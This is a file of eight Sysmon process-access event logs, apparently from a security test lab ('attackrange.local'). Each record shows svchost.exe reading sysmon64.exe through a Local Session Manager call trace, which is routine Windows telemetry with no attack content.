{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1408,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1409,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1410,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1411,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1412,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1413,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1414,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1415,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
